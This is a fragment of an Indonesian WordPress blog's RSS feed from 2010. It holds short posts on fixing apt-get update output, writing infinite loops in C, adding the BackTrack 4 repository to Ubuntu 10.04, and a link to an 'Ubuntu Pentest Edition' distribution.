<p>4.hasilnya<br />
<pre class="brush: plain; wrap-lines: false;">
root@puppet:/etc/apt/apt.conf.d# apt-get update
Hit http://archive.offensive-security.com pwnsauce Release.gpg                 
Ign http://archive.offensive-security.com/ pwnsauce/main Translation-en_US     
Hit http://security.ubuntu.com lucid-security Release.gpg                      
Ign http://security.ubuntu.com/ubuntu/ lucid-security/main Translation-en_US   
Hit http://ppa.launchpad.net lucid Release.gpg                                 
Ign http://ppa.launchpad.net/tualatrix/ppa/ubuntu/ lucid/main Translation-en_US
Hit http://archive.ubuntu.com lucid Release.gpg                                
Ign http://archive.ubuntu.com/ubuntu/ lucid/main Translation-en_US   
Ign http://archive.offensive-security.com/ pwnsauce/microverse Translation-en_US
Ign http://archive.offensive-security.com/ pwnsauce/macroverse Translation-en_US
Ign http://archive.offensive-security.com/ pwnsauce/restricted Translation-en_US
Ign http://archive.offensive-security.com/ pwnsauce/universe Translation-en_US
Ign http://archive.offensive-security.com/ pwnsauce/multiverse Translation-en_US
Ign http://security.ubuntu.com/ubuntu/ lucid-security/restricted Translation-en_US
bla...bla..bla....
</pre></p>
<p>sip&#8230; bisa di update dan upgrade lagi <img src='http://s0.wp.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/akfcode.wordpress.com/83/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/akfcode.wordpress.com/83/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/akfcode.wordpress.com/83/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/akfcode.wordpress.com/83/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/akfcode.wordpress.com/83/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/akfcode.wordpress.com/83/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/akfcode.wordpress.com/83/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/akfcode.wordpress.com/83/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/akfcode.wordpress.com/83/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/akfcode.wordpress.com/83/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/akfcode.wordpress.com/83/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/akfcode.wordpress.com/83/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/akfcode.wordpress.com/83/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/akfcode.wordpress.com/83/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=akfcode.wordpress.com&amp;blog=15834463&amp;post=83&amp;subd=akfcode&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://akfcode.wordpress.com/2010/10/06/fixing-error-dynamic-mmap-ran-out-of-room-di-debian/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/e0667eee4f8d6b8b9fd94b4046646644?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">akfcode</media:title>
		</media:content>
	</item>
		<item>
		<title>loop tiada akhir di C</title>
		<link>http://akfcode.wordpress.com/2010/10/05/loop-tiada-akhir-di-c/</link>
		<comments>http://akfcode.wordpress.com/2010/10/05/loop-tiada-akhir-di-c/#comments</comments>
		<pubDate>Tue, 05 Oct 2010 00:41:15 +0000</pubDate>
		<dc:creator>AKF</dc:creator>
				<category><![CDATA[c]]></category>
		<category><![CDATA[programming]]></category>
		<category><![CDATA[loop C]]></category>

		<guid isPermaLink="false">http://akfcode.wordpress.com/?p=81</guid>
		<description><![CDATA[contoh: dan<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=akfcode.wordpress.com&amp;blog=15834463&amp;post=81&amp;subd=akfcode&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>contoh:<br />
<pre class="brush: cpp;">
#include &lt;stdio.h&gt;
int main(){
	while(1){
		printf(&quot;looptiadaakhir\n&quot;);
		}
		return 0;
	
	}
</pre><br />
dan<br />
<pre class="brush: cpp;">
#include &lt;stdio.h&gt;
int main(){
	for(;;){
		printf(&quot;looptiadaakhir\n&quot;);
		}
		return 0;
	
	}
</pre></p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/akfcode.wordpress.com/81/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/akfcode.wordpress.com/81/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/akfcode.wordpress.com/81/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/akfcode.wordpress.com/81/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/akfcode.wordpress.com/81/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/akfcode.wordpress.com/81/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/akfcode.wordpress.com/81/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/akfcode.wordpress.com/81/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/akfcode.wordpress.com/81/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/akfcode.wordpress.com/81/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/akfcode.wordpress.com/81/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/akfcode.wordpress.com/81/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/akfcode.wordpress.com/81/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/akfcode.wordpress.com/81/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=akfcode.wordpress.com&amp;blog=15834463&amp;post=81&amp;subd=akfcode&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://akfcode.wordpress.com/2010/10/05/loop-tiada-akhir-di-c/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/e0667eee4f8d6b8b9fd94b4046646644?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">akfcode</media:title>
		</media:content>
	</item>
		<item>
		<title>menambahkan tools Backtrack 4 di ubuntu 10.04</title>
		<link>http://akfcode.wordpress.com/2010/10/01/menambahkan-tools-backtrack-4-di-ubuntu-10-04/</link>
		<comments>http://akfcode.wordpress.com/2010/10/01/menambahkan-tools-backtrack-4-di-ubuntu-10-04/#comments</comments>
		<pubDate>Fri, 01 Oct 2010 11:07:35 +0000</pubDate>
		<dc:creator>AKF</dc:creator>
				<category><![CDATA[Linux]]></category>
		<category><![CDATA[news]]></category>
		<category><![CDATA[whatever]]></category>
		<category><![CDATA[backtrack 4]]></category>
		<category><![CDATA[ubuntu]]></category>

		<guid isPermaLink="false">http://akfcode.wordpress.com/?p=74</guid>
		<description><![CDATA[steps: 1. download &#38; add key 2. tambahkan baris: di /etc/apt/sources.list 3.update repository 4.selesai bisa dilihat di synaptic<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=akfcode.wordpress.com&amp;blog=15834463&amp;post=74&amp;subd=akfcode&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>steps:<br />
1. download &amp; add key<br />
<pre class="brush: plain;">
akfsec@Indonesia:~$ wget -q http://archive.offensive-security.com/backtrack.gpg -O- | sudo apt-key add -ok-
</pre></p>
<p>2. tambahkan baris:<br />
<pre class="brush: plain;">
deb http://archive.offensive-security.com pwnsauce main microverse macroverse restricted universe multiverse
</pre></p>
<p>di <strong>/etc/apt/sources.list</strong></p>
<p>3.update repository<br />
<pre class="brush: plain;">
akfsec@Indonesia:~$ sudo apt-get update
</pre></p>
<p>4.selesai bisa dilihat di synaptic <img src='http://s0.wp.com/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' /> </p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/akfcode.wordpress.com/74/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/akfcode.wordpress.com/74/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/akfcode.wordpress.com/74/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/akfcode.wordpress.com/74/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/akfcode.wordpress.com/74/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/akfcode.wordpress.com/74/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/akfcode.wordpress.com/74/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/akfcode.wordpress.com/74/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/akfcode.wordpress.com/74/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/akfcode.wordpress.com/74/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/akfcode.wordpress.com/74/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/akfcode.wordpress.com/74/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/akfcode.wordpress.com/74/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/akfcode.wordpress.com/74/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=akfcode.wordpress.com&amp;blog=15834463&amp;post=74&amp;subd=akfcode&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://akfcode.wordpress.com/2010/10/01/menambahkan-tools-backtrack-4-di-ubuntu-10-04/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/e0667eee4f8d6b8b9fd94b4046646644?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">akfcode</media:title>
		</media:content>
	</item>
		<item>
		<title>ubuntu pentest edition</title>
		<link>http://akfcode.wordpress.com/2010/10/01/ubuntu-pentest-edition/</link>
		<comments>http://akfcode.wordpress.com/2010/10/01/ubuntu-pentest-edition/#comments</comments>
		<pubDate>Fri, 01 Oct 2010 10:36:47 +0000</pubDate>
		<dc:creator>AKF</dc:creator>
				<category><![CDATA[Linux]]></category>
		<category><![CDATA[news]]></category>

		<guid isPermaLink="false">http://akfcode.wordpress.com/?p=71</guid>
		<description><![CDATA[versi undergorund dari ubuntu, Ubuntu Pentest Edition, distro untuk forensic dan pentesting silahkan check di: Ubuntu Pentest Edition thanks.<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=akfcode.wordpress.com&amp;blog=15834463&amp;post=71&amp;subd=akfcode&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>versi undergorund dari ubuntu, Ubuntu Pentest Edition, distro untuk forensic dan pentesting silahkan check di:<br />
<a href="http://www.netinfinity.org/">Ubuntu Pentest Edition</a><br />
thanks.</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/akfcode.wordpress.com/71/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/akfcode.wordpress.com/71/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/akfcode.wordpress.com/71/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/akfcode.wordpress.com/71/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/akfcode.wordpress.com/71/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/akfcode.wordpress.com/71/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/akfcode.wordpress.com/71/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/akfcode.wordpress.com/71/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/akfcode.wordpress.com/71/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/akfcode.wordpress.com/71/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/akfcode.wordpress.com/71/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/akfcode.wordpress.com/71/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/akfcode.wordpress.com/71/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/akfcode.wordpress.com/71/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=akfcode.wordpress.com&amp;blog=15834463&amp;post=71&amp;subd=akfcode&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://akfcode.wordpress.com/2010/10/01/ubuntu-pentest-edition/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/e0667eee4f8d6b8b9fd94b4046646644?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">akfcode</media:title>
		</media:content>
	</item>
	</channel>
</rss>
